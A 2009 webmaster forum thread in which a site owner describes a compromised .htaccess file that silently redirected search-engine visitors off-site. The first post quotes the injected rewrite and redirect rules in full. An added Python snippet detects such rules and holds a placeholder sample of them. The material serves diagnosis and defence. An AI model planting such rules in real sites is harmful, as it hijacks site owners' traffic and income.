
Webmaster General Forum

    
.htaccess Hijacking Search Engine Traffic
.htaccess hacked
josjongejan




msg:3848198
 6:39 pm on Feb 12, 2009 (gmt 0)

If you suddenly find your traffic dropping over 90% and upon investigating find out that

- Your site loads fine
- Your DNS / host is fine
- Your rankings haven't changed
- All your search engine traffic is gone and remaining traffic is mostly direct visitors or referrals from a non-search engine site?

Well that's what happened to me.

Upon investigating, I found out the following was added to my .htaccess file:

RewriteCond %{HTTP_REFERER} ^.*(google\.|msn\.|live\.com|yahoo\.|altavista\.|aol\.|ask\.|eureka\.com|lycos\.com|hotbot\.com|infoseek\.com|webcrawler\.|excite\.|netscape\.com|mamma\.com|alltheweb\.com|northernlight\.com|rambler\.ru|aport\.ru|yandex\.ru|pingwin\.ru|www\.ru|punto\.ru|search\.comcast\.net|abcsok\.no|myspace\.com|looksmart\.com).* [NC]
RewriteRule ^(.*) /501.html [NS,NC,L]

RewriteCond %{HTTP_USER_AGENT} ^.*(bot|urp|msn).* [NC]
RewriteRule ^(.*) $1 [NS,NC,L]
Redirect /501.html http://<ip removed>

My .htaccess file is not chmodded 777 or anything crazy nor are any other files/folders on my ftp.
I also don't use any open source software (e.g. wordpress, vbulletin, etc.)

I have no clue why this happened to me. I googled the ip address and only found 1 other site that this happened to.

I hope this doesn't happen to you but if it did and you googled the ip I hope you find this thread so you can resolve the issue quickly.

It took me 3 days to figure this out and I lost a lot of traffic and consequently income from this little hijack.

I have asked my host to scan the server for rootkits and I changed my ftp password.

I am still seeking an explanation for how this code ended up in my .htaccess though so any information that may lead to that answer is greatly appreciated.

[edited by: physics at 9:21 pm (utc) on Feb. 12, 2009]

[edited by: phranque at 7:56 am (utc) on Feb. 13, 2009]
[edit reason] IP address removed. No specifics please. [/edit]
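
Added example, not part of the original posts: a small Python check that flags the pattern described above, a RewriteRule gated on a search-engine HTTP_REFERER whose local target is then sent off-site by a Redirect line. The engine watch-list, the function name and the sample file (with a placeholder host) are constructed for illustration.

```python
import re

# Assumed watch-list of search-engine names; extend it for your own traffic sources.
ENGINES = re.compile(r"google|msn|live|yahoo|bing|yandex|aol|ask", re.I)
COND = re.compile(r"^\s*RewriteCond\s+%\{HTTP_REFERER\}\s+(\S+)", re.I)
RULE = re.compile(r"^\s*RewriteRule\s+\S+\s+(\S+)", re.I)
# Redirect [status] URL-path URL, keeping only redirects to an absolute URL.
REDIRECT = re.compile(r"^\s*Redirect\s+(?:\S+\s+)?(\S+)\s+(https?://\S+)", re.I)

# Constructed sample modelled on the snippet in the post; the host is a placeholder.
SAMPLE = r"""
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(google\.|msn\.|yahoo\.).* [NC]
RewriteRule ^(.*) /501.html [NS,NC,L]
RewriteCond %{HTTP_USER_AGENT} ^.*(bot|urp|msn).* [NC]
RewriteRule ^(.*) $1 [NS,NC,L]
Redirect /501.html http://redirect-target.example.invalid
# legitimate canonical-host rule that must not be flagged
RewriteCond %{HTTP_HOST} ^example\.com$ [NC]
RewriteRule ^(.*)$ http://www.example.com/$1 [R=301,L]
"""

def scan_htaccess(text):
    """Return (line_no, kind, detail) findings for referer-gated redirects."""
    findings, gated, redirects, pending = [], {}, [], None
    for no, line in enumerate(text.splitlines(), 1):
        if line.lstrip().startswith("#"):
            continue
        m = COND.match(line)
        if m and ENGINES.search(m.group(1)):
            pending = no              # condition applies to the next RewriteRule
            continue
        m = RULE.match(line)
        if m:
            if pending:
                findings.append((pending, "referer-gated-rule", m.group(1)))
                gated[m.group(1)] = no
            pending = None            # a rule consumes all conditions before it
            continue
        m = REDIRECT.match(line)
        if m:
            redirects.append((no, m.group(1), m.group(2)))
    # Second pass: a Redirect whose source path is a gated rule's target.
    for no, path, url in redirects:
        if path in gated:
            findings.append((no, "external-hop", f"{path} -> {url}"))
    return findings
```

Findings are leads for manual review; a referer condition that names a search engine can also appear in legitimate rules.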

 

jdMorgan




msg:3848273
 8:46 pm on Feb 12, 2009 (gmt 0)

We had a thread here recently where a victim of a similar exploit found malware on his own PC that may have allowed his server login info to be captured from his PC and reported to persons unknown. He had found code very similar to what you posted above in his .htaccess file.

The code on his site shared some similarity to what you posted here, in that it was poorly-coded, and probably didn't work quite as intended.

Jim

physics




msg:3848315
 9:33 pm on Feb 12, 2009 (gmt 0)

josjongejan, what OS is your site running on?
Are you using cpanel?
As jdMorgan mentioned maybe the exploit came from your PC. Did you try running a full virus scan?

josjongejan




msg:3848503
 4:43 am on Feb 13, 2009 (gmt 0)

It's a cPanel server from [snip] not sure on the platform but I'm guessing it's either Linux or FreeBSD

Just did a full scan with McAfee latest definitions too, nothing found.

In my 12 years online I've never been infected by a virus, I'm pretty careful/aware

Thanks for the replies so far, I appreciate your time and effort

[edited by: phranque at 7:56 am (utc) on Feb. 13, 2009]
[edit reason] No urls, please. See TOS [webmasterworld.com] [/edit]
